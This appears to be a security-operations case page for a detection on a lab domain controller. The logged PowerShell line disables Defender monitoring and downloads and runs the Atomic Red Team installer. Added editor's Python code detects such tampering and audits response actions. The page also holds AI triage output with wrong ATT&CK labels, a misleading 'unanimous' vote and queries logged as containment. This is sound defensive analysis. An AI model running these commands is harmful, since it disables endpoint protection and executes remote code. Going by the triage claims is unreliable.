critical · closed · true positive

๐Ÿท๏ธ Analyst Verdict Classification

TP by analyst

🤖 AI Analysis

🔔 Detections (1)

Realtime Monitoring Tampering · critical
Rule: general.RealTime Monitoring Tampering
Hostname: df-labsdc01.dflabs.local · Sensor: e4a1c62d-4d1f-44...
Event Type: NEW_PROCESS
Confidence: 90% · Verdict: true positive
Event Data:
BASE_ADDRESS:
140694944940032
COMMAND_LINE:
PowerShell.exe Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039
FILE_IS_SIGNED:
1
FILE_PATH:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
HASH:
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
MEMORY_USAGE:
249815040
PARENT:
{'BASE_ADDRESS': 140698856259584, 'COMMAND_LINE': 'cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ', 'FILE_IS_SIGNED': 1, 'FILE_PATH': 'C:\\Windows\\System32\\cmd.exe', 'HASH': '3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2', 'MEMORY_USAGE': 4575232, 'PARENT_ATOM': 'd2b1ecad7af81b32ac16ae0d69c2a7fe', 'PARENT_PROCESS_ID': 3496, 'PROCESS_ID': 8460, 'THIS_ATOM': 'c896e11e93fdfcc580e177e469c2a841', 'THREADS': 3, 'TIMESTAMP': 1774364737221, 'USER_NAME': 'NT AUTHORITY\\SYSTEM'}
PARENT_PROCESS_ID:
8460
PROCESS_ID:
9156
THREADS:
30
USER_NAME:
NT AUTHORITY\SYSTEM
IOCs:
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c
Set-MpPreference -DisableRealtimeMonitoring $true
IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1' -UseBasicParsing)
Invoke-AtomicTest T1039
MITRE: T1059 T1078 T1039 T1567.001
Analyst Declaration:
📄 Raw Detection JSON
{
  "author": "ckeller@fusioncybersecurity.us",
  "cat": "Realtime Monitoring Tampering",
  "detect": {
    "event": {
      "BASE_ADDRESS": 140694944940032,
      "COMMAND_LINE": "PowerShell.exe  Set-ExecutionPolicy Unrestricted ; [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; Install-PackageProvider -Name NuGet -MinimumVersion 2.8.5.201 -Force; Set-MpPreference -DisableRealtimeMonitoring $true ; IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing) ; Install-AtomicRedTeam -Force -getAtomics; Invoke-AtomicTest T1039 -CheckPrereqs ; Invoke-AtomicTest T1039 -GetPrereqs ; Invoke-AtomicTest T1039 ",
      "FILE_IS_SIGNED": 1,
      "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
      "HASH": "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
      "MEMORY_USAGE": 249815040,
      "PARENT": {
        "BASE_ADDRESS": 140698856259584,
        "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 ",
        "FILE_IS_SIGNED": 1,
        "FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
        "HASH": "3656f37a1c6951ec4496fabb8ee957d3a6e3c276d5a3785476b482c9c0d32ea2",
        "MEMORY_USAGE": 4575232,
        "PARENT_ATOM": "d2b1ecad7af81b32ac16ae0d69c2a7fe",
        "PARENT_PROCESS_ID": 3496,
        "PROCESS_ID": 8460,
        "THIS_ATOM": "c896e11e93fdfcc580e177e469c2a841",
        "THREADS": 3,
        "TIMESTAMP": 1774364737221,
        "USER_NAME": "NT AUTHORITY\\SYSTEM"
      },
      "PARENT_PROCESS_ID": 8460,
      "PROCESS_ID": 9156,
      "THREADS": 30,
      "USER_NAME": "NT AUTHORITY\\SYSTEM"
    },
    "routing": {
      "arch": 2,
      "did": "",
      "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
      "event_time": 1774364737793,
      "event_type": "NEW_PROCESS",
      "ext_ip": "67.60.122.240",
      "hostname": "df-labsdc01.dflabs.local",
      "iid": "47501359-645e-4049-906e-e6195da7afcf",
      "int_ip": "192.168.45.129",
      "latency": 3799,
      "moduleid": 2,
      "oid": "ad19afae-3759-4207-b06e-8648b225c455",
      "parent": "c896e11e93fdfcc580e177e469c2a841",
      "plat": 268435456,
      "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
      "tags": [
        "domain-controller",
        "fusion-soc-alert",
        "fusion-soc-case",
        "fusion-soc-pulled",
        "fusion-soc-triage"
      ],
      "this": "20e47fdec03e5cfc9f50dea369c2a844"
    }
  },
  "detect_id": "23905730-9898-4d94-be3f-9cdf69c2a845",
  "gen_time": 1774364741594,
  "link": "https://app.limacharlie.io/orgs/ad19afae-3759-4207-b06e-8648b225c455/sensors/e4a1c62d-4d1f-4472-bae4-43291246b4d4/timeline?time=1774364737\u0026selected=20e47fdec03e5cfc9f50dea369c2a844",
  "namespace": "general",
  "routing": {
    "arch": 2,
    "did": "",
    "event_id": "942080e1-239e-4ded-8513-ffb1c5bcc3a2",
    "event_time": 1774364737793,
    "event_type": "NEW_PROCESS",
    "ext_ip": "67.60.122.240",
    "hostname": "df-labsdc01.dflabs.local",
    "iid": "47501359-645e-4049-906e-e6195da7afcf",
    "int_ip": "192.168.45.129",
    "latency": 3799,
    "moduleid": 2,
    "oid": "ad19afae-3759-4207-b06e-8648b225c455",
    "parent": "c896e11e93fdfcc580e177e469c2a841",
    "plat": 268435456,
    "sid": "e4a1c62d-4d1f-4472-bae4-43291246b4d4",
    "tags": [
      "domain-controller",
      "fusion-soc-alert",
      "fusion-soc-case",
      "fusion-soc-pulled",
      "fusion-soc-triage"
    ],
    "this": "20e47fdec03e5cfc9f50dea369c2a844"
  },
  "source": "ad19afae-3759-4207-b06e-8648b225c455.47501359-645e-4049-906e-e6195da7afcf.e4a1c62d-4d1f-4472-bae4-43291246b4d4.10000000.2",
  "source_rule": "general.RealTime Monitoring Tampering",
  "ts": 1774364741000
}
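The rule named in this record, general.RealTime Monitoring Tampering, fired on the NEW_PROCESS event above because the command line runs Set-MpPreference -DisableRealtimeMonitoring $true. In ATT&CK that is T1562.001 (Impair Defenses: Disable or Modify Tools), which the triage output does not list; T1039, which the triage glosses as "Execution of Program", is Data from Network Shared Drive, the technique ID passed to Invoke-AtomicTest. Two further points for whoever reviews this alert: the [Net.ServicePointManager]::SecurityProtocol assignment forces TLS 1.2 for the download and bypasses nothing, and the signed binary, the System32 path and the 0/72 VirusTotal result describe powershell.exe itself, so they hold for every PowerShell launch and cannot lower the verdict. The block below is an added example written for this page, not code from LimaCharlie, FusionSOC or Atomic Red Team: it re-derives that check over events in the field layout shown above, including the -EncodedCommand and exclusion-path variants the page's event does not exercise. The parameter prefixes, regular expressions, the DFLABS\helpdesk user and the two extra sample events are the editor's assumptions.

```python
"""Added example for this page (editor's code, not LimaCharlie's, FusionSOC's or
Atomic Red Team's): decide whether a NEW_PROCESS record tampers with Defender
real-time protection. Parameter lists, patterns and samples are assumptions."""
import base64
import re

# Set-MpPreference / Add-MpPreference arguments that weaken Defender. PowerShell
# binds any unambiguous prefix of a parameter name, so match on the prefix:
# -DisableRealtimeMonitoring, -DisableRealtimeM and -DisableReal all bind the
# same parameter.
MP_CALL = re.compile(r"\b(?:Set|Add)-MpPreference\b(?P<args>[^;|\r\n]*)", re.I)
MP_ARG = re.compile(r"-(?P<param>Disable\w*|Exclusion\w*)(?:[:\s]+(?P<val>\S+))?", re.I)
TRUTHY = {"$true", "1", "true"}
# One-statement download-and-execute: IEX (IWR ...), IEX (...).DownloadString(...)
DOWNLOAD_EXEC = re.compile(
    r"\b(?:IEX|Invoke-Expression)\b[^;]*"
    r"\b(?:IWR|Invoke-WebRequest|IRM|Invoke-RestMethod|DownloadString|DownloadFile)\b",
    re.I,
)
# powershell.exe -EncodedCommand / -enc / -ec / -e <base64 of a UTF-16LE script>
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+(?P<b64>[A-Za-z0-9+/=]+)", re.I)


def encode_command(script: str) -> str:
    """Produce the payload powershell.exe -EncodedCommand expects."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def expand_command_line(cmdline: str) -> tuple[str, bool]:
    """Return the script that will actually run and whether it was encoded."""
    m = ENCODED.search(cmdline)
    if not m:
        return cmdline, False
    try:
        script = base64.b64decode(m.group("b64"), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline, False  # not a real payload; fall back to the raw line
    return cmdline[: m.start()] + " " + script, True


def tamper_settings(script: str) -> list[str]:
    """Defender settings the script disables, or exclusions it adds."""
    found = []
    for call in MP_CALL.finditer(script):
        for arg in MP_ARG.finditer(call.group("args")):
            param, val = arg.group("param"), (arg.group("val") or "").lower()
            if param.lower().startswith("disable") and val not in TRUTHY:
                continue  # -DisableX $false or 0 turns protection back on
            found.append(param)
    return found


def process_chain(event: dict) -> list[str]:
    """Image names from the outermost nested PARENT down to this process."""
    chain, node = [], event
    while node:
        chain.append(node.get("FILE_PATH", "?").rsplit("\\", 1)[-1].lower())
        node = node.get("PARENT")
    return chain[::-1]


def looks_trusted(event: dict) -> bool:
    """Signed and under System32: true for the page's event and for every
    ordinary PowerShell launch, so it cannot decide the verdict on its own."""
    path = event.get("FILE_PATH", "").lower()
    return bool(event.get("FILE_IS_SIGNED")) and path.startswith("c:\\windows\\system32\\")


def evaluate(event: dict) -> dict:
    """Apply the check to one NEW_PROCESS record in LimaCharlie's field layout."""
    script, encoded = expand_command_line(event.get("COMMAND_LINE", ""))
    tampered = tamper_settings(script)
    return {
        "alert": bool(tampered),
        "tampered": tampered,
        "download_exec": bool(DOWNLOAD_EXEC.search(script)),
        "encoded": encoded,
        "trusted_binary": looks_trusted(event),
        "chain": process_chain(event),
        "user": event.get("USER_NAME", ""),
    }


# Constructed samples. PAGE_EVENT abridges the command line of the record above;
# the other two are hypothetical variants the rule should also separate.
PAGE_EVENT = {
    "COMMAND_LINE": (
        "PowerShell.exe Set-ExecutionPolicy Unrestricted ; "
        "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 ; "
        "Set-MpPreference -DisableRealtimeMonitoring $true ; "
        "IEX (IWR 'https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/"
        "master/install-atomicredteam.ps1' -UseBasicParsing) ; Invoke-AtomicTest T1039"
    ),
    "FILE_IS_SIGNED": 1,
    "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "USER_NAME": "NT AUTHORITY\\SYSTEM",
    "PARENT": {"FILE_PATH": "C:\\Windows\\System32\\cmd.exe",
               "COMMAND_LINE": "cmd.exe /C C:\\Windows\\TEMP\\pld9B56.tmp.bat T1039 "},
}
ADMIN_REENABLE = {  # same binary, same path, opposite intent: must not alert
    "COMMAND_LINE": "powershell.exe Set-MpPreference -DisableRealtimeMonitoring $false",
    "FILE_IS_SIGNED": 1,
    "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "USER_NAME": "DFLABS\\helpdesk",  # hypothetical account
}
ENCODED_EXCLUSION = {  # exclusion added through an encoded command: must alert
    "COMMAND_LINE": "powershell.exe -nop -w hidden -enc "
    + encode_command("Add-MpPreference -ExclusionPath C:\\Users\\Public"),
    "FILE_IS_SIGNED": 1,
    "FILE_PATH": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "USER_NAME": "DFLABS\\helpdesk",
}

if __name__ == "__main__":
    for name, ev in (("page", PAGE_EVENT), ("reenable", ADMIN_REENABLE),
                     ("encoded", ENCODED_EXCLUSION)):
        print(name, evaluate(ev))
```

Run against the page's event it returns alert=True with DisableRealtimeMonitoring as the tampered setting, download_exec=True and the cmd.exe → powershell.exe chain under NT AUTHORITY\SYSTEM; the re-enable variant returns alert=False even though trusted_binary is True for both, which is the point about path and signature. The decoder only trusts a payload that is valid base64 over UTF-16LE; anything else is scanned as the raw line rather than dropped.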
🌐 Threat Intel JSON
{
  "virustotal": {
    "malicious": false,
    "provider": "virustotal",
    "reputation": 73,
    "stats": {
      "confirmed-timeout": 0,
      "failure": 0,
      "harmless": 0,
      "malicious": 0,
      "suspicious": 0,
      "timeout": 0,
      "type-unsupported": 4,
      "undetected": 72
    }
  }
}
🤖 Triage JSON
{
  "confidence": 0.9,
  "false_positive_reason": null,
  "investigation_questions": [
    "What other processes were spawned by PID 8460 (cmd.exe) that executed the ART framework?",
    "Were there any network connections established during this execution window?",
    "Is there evidence of persistence mechanisms installed alongside the ART deployment?",
    "Has this host been part of a previous lateral movement campaign?"
  ],
  "ioc_analysis": "The PowerShell process is located in the expected System32 directory and is Microsoft-signed (HASH matches official binaries), which creates a false positive scenario for location-based detection. However, the command line arguments are highly suspicious: they disable real-time monitoring, bypass security protocols, download code from an external source (redcanaryco/invoke-atomicredteam), and explicitly invoke T1039 (Execution of Program) techniques. The presence of \u0027IEX\u0027 (Invoke-Expression) with a remote URL is a definitive indicator of malicious intent.",
  "iocs_extracted": [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
    "de96a6e69944335375dc1ac238336066889d9ffc7d73628ef4fe1b1b160ab32c",
    "Set-MpPreference -DisableRealtimeMonitoring $true",
    "IEX (IWR \u0027https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/install-atomicredteam.ps1\u0027 -UseBasicParsing)",
    "Invoke-AtomicTest T1039"
  ],
  "mitre_techniques": [
    "T1059",
    "T1078",
    "T1039",
    "T1567.001"
  ],
  "recommended_actions": [
    "ESCALATE to Incident Response (unanimous AI verdict)",
    "Isolate affected sensor immediately",
    "Isolate the host immediately to prevent lateral movement",
    "Block outbound traffic to raw.githubusercontent.com at the network perimeter",
    "Review all SYSTEM-level PowerShell processes for similar command line patterns",
    "Check Event Logs for additional T1039 execution attempts or file modifications",
    "Preserve memory dump and process tree for forensic analysis"
  ],
  "risk_score": 90,
  "severity": "critical",
  "summary": "**Vote: UNANIMOUS (2/2 -\u003e TRUE POSITIVE)**\n\n### \u264a gemini-cli Analysis (Primary)\nFailed or timed out.\n\n---\n\n### \ud83e\udd16 qwen3.5:4b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.95\nThis event represents a confirmed malicious execution of the Atomic Red Team (ART) framework under SYSTEM privileges, bypassing real-time monitoring and executing T1039 techniques. The process is signed but its command line contains explicit indicators of compromise including disabling security protocols and downloading scripts from an external GitHub repository.\n\n**IOC Analysis:** The PowerShell process is located in the expected System32 directory and is Microsoft-signed (HASH matches official binaries), which creates a false positive scenario for location-based detection. However, the command line arguments are highly suspicious: they disable real-time monitoring, bypass security protocols, download code from an external source (redcanaryco/invoke-atomicredteam), and explicitly invoke T1039 (Execution of Program) techniques. The presence of \u0027IEX\u0027 (Invoke-Expression) with a remote URL is a definitive indicator of malicious intent.\n\n---\n\n### \ud83e\udd16 deepseek-r1:8b Analysis (Secondary)\n**Verdict:** true_positive | **Confidence:** 0.85\nA legitimate PowerShell process from C:\\Windows\\System32 is executing a command to disable real-time monitoring and install potentially malicious tools, indicating a high-risk attempt to evade security measures.\n\n**IOC Analysis:** The FILE_PATH is a known Windows system binary located in C:\\Windows\\System32, and the HASH matches a Microsoft-signed PowerShell binary, making it benign based on IOC validation. However, the malicious command line directly disables real-time monitoring and installs tools from external sources, confirming the activity as malicious despite the legitimate process.",
  "verdict": "true_positive",
  "voting": {
    "auto_action": "escalate_ir",
    "mode": "unanimous",
    "total_models": 2,
    "vote_summary": [
      "qwen3.5:4b: true_positive (critical, 95% confidence)",
      "deepseek-r1:8b: true_positive (high, 85% confidence)"
    ],
    "votes": [
      {
        "confidence": 0.95,
        "model": "qwen3.5:4b",
        "verdict": "true_positive"
      },
      {
        "confidence": 0.85,
        "model": "deepseek-r1:8b",
        "verdict": "true_positive"
      }
    ],
    "winning_count": 2,
    "winning_verdict": "true_positive"
  }
}

⚙️ Response Actions

Action · Target · Status · Result
tag · e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated · failed · 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
recommended · ESCALATE to Incident Response (unanimous AI verdict) · executed · General Activity Sweep: 0 events found
recommended · Isolate affected sensor immediately · executed · General Activity Sweep: 0 events found
recommended · Isolate the host immediately to prevent lateral movement · executed · Lateral Movement Investigation: 50 events found
recommended · Block outbound traffic to raw.githubusercontent.com at the network perimeter · executed · User Activity Investigation: 31 events found
recommended · Review all SYSTEM-level PowerShell processes for similar command line patterns · executed · Process Tree Investigation: 75 events found
recommended · Check Event Logs for additional T1039 execution attempts or file modifications · executed · File Activity Investigation: 0 events found
recommended · Preserve memory dump and process tree for forensic analysis · executed · Process Tree Investigation: 75 events found
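Read column by column, the table says less than its Status column suggests. The one row that called the LimaCharlie API (tag) failed with 401 Unauthorized, so the sensor never received the fusionsoc-investigated tag, and every "recommended" row reports an investigation query (a sweep or an n-events-found search) rather than the containment, escalation or evidence-collection step the recommendation names. Nothing in this record shows the host being isolated or the outbound destination blocked before the case was closed. The block below is an added example, the editor's code and not FusionSOC's, that audits an action log of this shape for exactly those two conditions; the keyword lists are assumptions, and the rows are transcribed from the table above.

```python
"""Added example (editor's code, not FusionSOC's): audit a response-action log
for recommendations recorded as executed that only ran a query, and for API
calls that failed. Keyword lists are the editor's assumptions."""
import re

# What kind of step a recommendation asks for (first match wins).
ACTION_KIND = (
    (re.compile(r"\b(?:isolate|block|quarantine|kill|disable)\b", re.I), "containment"),
    (re.compile(r"\b(?:escalate|notify|page)\b", re.I), "escalation"),
    (re.compile(r"\b(?:preserve|dump|collect|acquire)\b", re.I), "collection"),
    (re.compile(r"\b(?:review|check|hunt|search|investigat)", re.I), "investigation"),
)
# Results of the form "<query name>: <n> events found" are searches, not actions.
QUERY_RESULT = re.compile(r"^(?P<name>.+?): (?P<n>\d+) events? found$")
HTTP_ERROR = re.compile(r"\b(?P<code>[45]\d\d) (?:Client|Server) Error\b")


def classify(recommendation: str) -> str:
    """Map free-text recommendation to the kind of step it asks for."""
    for pattern, kind in ACTION_KIND:
        if pattern.search(recommendation):
            return kind
    return "unknown"


def audit(rows):
    """rows: (action, target, status, result) tuples, one per table row.
    Returns one finding per failed call and per recommendation that resolved
    to a query although it asked for something other than an investigation."""
    findings = []
    for action, target, status, result in rows:
        if status != "executed":
            m = HTTP_ERROR.search(result)
            findings.append({"target": target, "problem": "failed",
                             "http_status": int(m.group("code")) if m else None})
            continue
        kind = classify(target) if action == "recommended" else action
        query = QUERY_RESULT.match(result)
        if query and kind != "investigation":
            findings.append({"target": target, "problem": "query_instead_of_" + kind,
                             "ran": query.group("name"), "events": int(query.group("n"))})
    return findings


def containment_applied(rows) -> bool:
    """True only if some containment recommendation produced a non-query result."""
    return any(
        status == "executed" and classify(target) == "containment"
        and not QUERY_RESULT.match(result)
        for action, target, status, result in rows if action == "recommended"
    )


# Transcribed from the Response Actions table on this page.
PAGE_ROWS = [
    ("tag", "e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated", "failed",
     "401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/"
     "e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated"),
    ("recommended", "ESCALATE to Incident Response (unanimous AI verdict)", "executed",
     "General Activity Sweep: 0 events found"),
    ("recommended", "Isolate affected sensor immediately", "executed",
     "General Activity Sweep: 0 events found"),
    ("recommended", "Isolate the host immediately to prevent lateral movement", "executed",
     "Lateral Movement Investigation: 50 events found"),
    ("recommended", "Block outbound traffic to raw.githubusercontent.com at the network perimeter",
     "executed", "User Activity Investigation: 31 events found"),
    ("recommended", "Review all SYSTEM-level PowerShell processes for similar command line patterns",
     "executed", "Process Tree Investigation: 75 events found"),
    ("recommended", "Check Event Logs for additional T1039 execution attempts or file modifications",
     "executed", "File Activity Investigation: 0 events found"),
    ("recommended", "Preserve memory dump and process tree for forensic analysis", "executed",
     "Process Tree Investigation: 75 events found"),
]

if __name__ == "__main__":
    for finding in audit(PAGE_ROWS):
        print(finding)
    print("containment applied:", containment_applied(PAGE_ROWS))
```

On the page's rows this yields six findings: the 401 on the tag call, and five recommendations (escalate, both isolates, block, preserve) that resolved to a query; the two review/check rows are investigations and pass. containment_applied returns False, which is the fact an analyst closing this case would want in front of them.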

💬 Notes (8)

🤖 FusionSOC AI 2026-03-24T17:22
🤖 FusionSOC AI 2026-03-24T17:22
🤖 FusionSOC AI 2026-03-24T17:22
🤖 FusionSOC AI 2026-03-24T17:22
🤖 FusionSOC AI 2026-03-24T17:22
🤖 FusionSOC AI 2026-03-24T17:22
🤖 FusionSOC AI 2026-03-24T17:22
🤖 FusionSOC AI 2026-03-24T17:22

📜 Timeline

2026-03-24T17:24:18 · analyst · Status changed: investigating → closed
2026-03-24T17:23:59 · analyst · Analyst classified as True Positive (TP)
2026-03-24T17:22:58 · FusionSOC AI · Status changed: investigating → investigating
2026-03-24T17:22:58 · FusionSOC · Action recommended → executed: Process Tree Investigation: 75 events found
2026-03-24T17:22:58 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 Process Tree Investigation **Action:** Preserve memory dump and process tree for forensic analysis **Sensor:** `e4a...
2026-03-24T17:22:57 · FusionSOC · Response action queued: recommended on Preserve memory dump and process tree for forensic analysis
2026-03-24T17:22:57 · FusionSOC AI · Status changed: investigating → investigating
2026-03-24T17:22:57 · FusionSOC · Action recommended → executed: File Activity Investigation: 0 events found
2026-03-24T17:22:57 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 File Activity Investigation **Action:** Check Event Logs for additional T1039 execution attempts or file modificati...
2026-03-24T17:22:55 · FusionSOC · Response action queued: recommended on Check Event Logs for additional T1039 execution attempts or file modifications
2026-03-24T17:22:55 · FusionSOC AI · Status changed: investigating → investigating
2026-03-24T17:22:55 · FusionSOC · Action recommended → executed: Process Tree Investigation: 75 events found
2026-03-24T17:22:55 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 Process Tree Investigation **Action:** Review all SYSTEM-level PowerShell processes for similar command line patter...
2026-03-24T17:22:55 · FusionSOC · Response action queued: recommended on Review all SYSTEM-level PowerShell processes for similar command line patterns
2026-03-24T17:22:55 · FusionSOC AI · Status changed: investigating → investigating
2026-03-24T17:22:55 · FusionSOC · Action recommended → executed: User Activity Investigation: 31 events found
2026-03-24T17:22:55 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 User Activity Investigation **Action:** Block outbound traffic to raw.githubusercontent.com at the network perimete...
2026-03-24T17:22:54 · FusionSOC · Response action queued: recommended on Block outbound traffic to raw.githubusercontent.com at the network perimeter
2026-03-24T17:22:54 · FusionSOC AI · Status changed: investigating → investigating
2026-03-24T17:22:54 · FusionSOC · Action recommended → executed: Lateral Movement Investigation: 50 events found
2026-03-24T17:22:54 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 Lateral Movement Investigation **Action:** Isolate the host immediately to prevent lateral movement **Sensor:** `e4...
2026-03-24T17:22:53 · FusionSOC · Response action queued: recommended on Isolate the host immediately to prevent lateral movement
2026-03-24T17:22:53 · FusionSOC AI · Status changed: investigating → investigating
2026-03-24T17:22:53 · FusionSOC · Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T17:22:53 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** Isolate affected sensor immediately **Sensor:** `e4a1c62d-4d1f-44...` **Time Win...
2026-03-24T17:22:53 · FusionSOC · Response action queued: recommended on Isolate affected sensor immediately
2026-03-24T17:22:53 · FusionSOC AI · Status changed: open → investigating
2026-03-24T17:22:53 · FusionSOC · Action recommended → executed: General Activity Sweep: 0 events found
2026-03-24T17:22:53 · FusionSOC AI · Note by FusionSOC AI: ## 🔍 General Activity Sweep **Action:** ESCALATE to Incident Response (unanimous AI verdict) **Sensor:** `e4a1c62d-4d1f-...
2026-03-24T17:22:52 · FusionSOC · Response action queued: recommended on ESCALATE to Incident Response (unanimous AI verdict)
2026-03-24T17:22:52 · FusionSOC · Action tag → failed: 401 Client Error: Unauthorized for url: https://api.limacharlie.io/v1/e4a1c62d-4d1f-4472-bae4-43291246b4d4/tags?tags=fusionsoc-investigated
2026-03-24T17:22:52 · FusionSOC · Response action queued: tag on e4a1c62d-4d1f-4472-bae4-43291246b4d4:fusionsoc-investigated
2026-03-24T17:22:52 · FusionSOC AI · Detection 23905730-9898-4d94-be3f-9cdf69c2a845 triaged as true_positive (critical severity, confidence: 90%)
2026-03-24T17:22:52 · FusionSOC AI · Case created from detection: general.RealTime Monitoring Tampering